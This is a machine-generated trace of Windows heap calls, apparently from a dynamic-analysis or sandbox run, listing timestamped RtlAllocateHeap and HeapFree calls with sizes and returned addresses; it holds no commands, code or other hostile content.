	[0192.734] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191e98
	[0192.734] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185b40
	[0192.734] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c5c8
	[0192.734] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185b78
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185a60 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c388 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118db30 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191df8 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c460 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191dd0 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x30b508 | out: hHeap=0x260000) returned 1
	[0192.734] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191dd0
	[0192.734] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c460
	[0192.734] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191df8
	[0192.734] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x118db30
	[0192.734] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c388
	[0192.734] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x118dba0
	[0192.734] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191ec0
	[0192.734] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185a60
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f3a8 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185b08 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d80 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185ad0 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191e48 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d30 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f568 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f140 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191da8 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d58 | out: hHeap=0x260000) returned 1
	[0192.734] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1186248 | out: hHeap=0x260000) returned 1
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xe0) returned 0x335470
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x11f) returned 0x35ae60
	[0192.735] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x32d9c0 | out: hHeap=0x260000) returned 1
	[0192.735] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x335470 | out: hHeap=0x260000) returned 1
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xe0) returned 0x335470
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d58
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191da8
	[0192.735] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d58 | out: hHeap=0x260000) returned 1
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d58
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d30
	[0192.735] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d58 | out: hHeap=0x260000) returned 1
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0192.735] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f140
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f568
	[0192.735] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f140 | out: hHeap=0x260000) returned 1
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d58
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191e48
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d80
	[0192.735] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191e48 | out: hHeap=0x260000) returned 1
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191e48
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191ee8
	[0192.735] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d80 | out: hHeap=0x260000) returned 1
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d80
	[0192.735] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191ee8 | out: hHeap=0x260000) returned 1
	[0192.735] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191e48 | out: hHeap=0x260000) returned 1
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178ff8
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1179050
	[0192.735] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178ff8 | out: hHeap=0x260000) returned 1
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191e48
	[0192.735] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178ff8
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1179050 | out: hHeap=0x260000) returned 1
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1179050
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178ff8 | out: hHeap=0x260000) returned 1
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191e48 | out: hHeap=0x260000) returned 1
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x27e078
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f140
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27e078 | out: hHeap=0x260000) returned 1
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191e48
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x258) returned 0x117e470
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191ee8
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x1175ae0
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191f10
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f3a8
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x1176740
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185ad0
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191f38
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x11766f8
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191f60
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185b08
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x1175cd8
	[0192.736] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185bb0
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185b78 | out: hHeap=0x260000) returned 1
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c5c8 | out: hHeap=0x260000) returned 1
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185b40 | out: hHeap=0x260000) returned 1
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191e98 | out: hHeap=0x260000) returned 1
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c538 | out: hHeap=0x260000) returned 1
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191e70 | out: hHeap=0x260000) returned 1
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118dba0 | out: hHeap=0x260000) returned 1
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c388 | out: hHeap=0x260000) returned 1
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118db30 | out: hHeap=0x260000) returned 1
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191df8 | out: hHeap=0x260000) returned 1
	[0192.736] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c460 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191dd0 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35fe20 | out: hHeap=0x260000) returned 1
	[0192.737] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191dd0
	[0192.737] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c460
	[0192.737] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191df8
	[0192.737] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178ff8
	[0192.737] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c388
	[0192.737] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x11793c0
	[0192.737] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191e70
	[0192.737] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x118db30
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f140 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191e48 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1179050 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d80 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d58 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f568 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d30 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191da8 | out: hHeap=0x260000) returned 1
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x335470 | out: hHeap=0x260000) returned 1
	[0192.737] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xe0) returned 0x335470
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x335470 | out: hHeap=0x260000) returned 1
	[0192.737] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xe0) returned 0x335470
	[0192.737] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191da8
	[0192.737] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d30
	[0192.737] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191da8 | out: hHeap=0x260000) returned 1
	[0192.737] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f568
	[0192.737] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0192.738] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f568 | out: hHeap=0x260000) returned 1
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0192.738] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f568
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f140
	[0192.738] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f568 | out: hHeap=0x260000) returned 1
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f568
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185b40
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185b78
	[0192.738] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185b40 | out: hHeap=0x260000) returned 1
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191da8
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185b40
	[0192.738] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185b78 | out: hHeap=0x260000) returned 1
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185b78
	[0192.738] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185b40 | out: hHeap=0x260000) returned 1
	[0192.738] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191da8 | out: hHeap=0x260000) returned 1
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c538
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c5c8
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x11760c8
	[0192.738] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c5c8 | out: hHeap=0x260000) returned 1
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191da8
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c5c8
	[0192.738] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11760c8 | out: hHeap=0x260000) returned 1
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x11760c8
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x1175c00
	[0192.738] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c5c8 | out: hHeap=0x260000) returned 1
	[0192.738] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191da8 | out: hHeap=0x260000) returned 1
	[0192.738] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x27e078
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185b40
	[0192.739] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27e078 | out: hHeap=0x260000) returned 1
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191da8
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185be8
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x320) returned 0x1175330
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d58
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c5c8
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d80
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185c20
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x3387e8
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185c58
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191e48
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33a990
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191e98
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185c90
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33a9d8
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185cc8
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191f88
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33aa20
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191fb0
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33aa68
	[0192.739] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0192.739] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185ad0 | out: hHeap=0x260000) returned 1
	[0192.739] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1176740 | out: hHeap=0x260000) returned 1
	[0192.739] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f3a8 | out: hHeap=0x260000) returned 1
	[0192.739] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191f10 | out: hHeap=0x260000) returned 1
	[0192.739] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1175ae0 | out: hHeap=0x260000) returned 1
	[0192.739] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191ee8 | out: hHeap=0x260000) returned 1
	[0192.739] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185bb0 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1175cd8 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185b08 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191f60 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11766f8 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191f38 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11793c0 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c388 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178ff8 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191df8 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c460 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191dd0 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117e470 | out: hHeap=0x260000) returned 1
	[0192.740] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185b08
	[0192.740] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c460
	[0192.740] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185bb0
	[0192.740] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c388
	[0192.740] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33aab0
	[0192.740] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x33aaf8
	[0192.740] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191dd0
	[0192.740] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185ad0
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185b40 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185be8 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191da8 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1175c00 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11760c8 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c538 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185b78 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f568 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f140 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d30 | out: hHeap=0x260000) returned 1
	[0192.740] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x335470 | out: hHeap=0x260000) returned 1
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xd0) returned 0x312e30
	[0192.741] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x312e30 | out: hHeap=0x260000) returned 1
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xd0) returned 0x312e30
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d30
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191da8
	[0192.741] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d30 | out: hHeap=0x260000) returned 1
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d30
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191df8
	[0192.741] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d30 | out: hHeap=0x260000) returned 1
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0192.741] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f140
	[0192.741] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d30
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191f38
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191f60
	[0192.741] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191f38 | out: hHeap=0x260000) returned 1
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191f38
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191ee8
	[0192.741] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191f60 | out: hHeap=0x260000) returned 1
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0192.741] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191f60
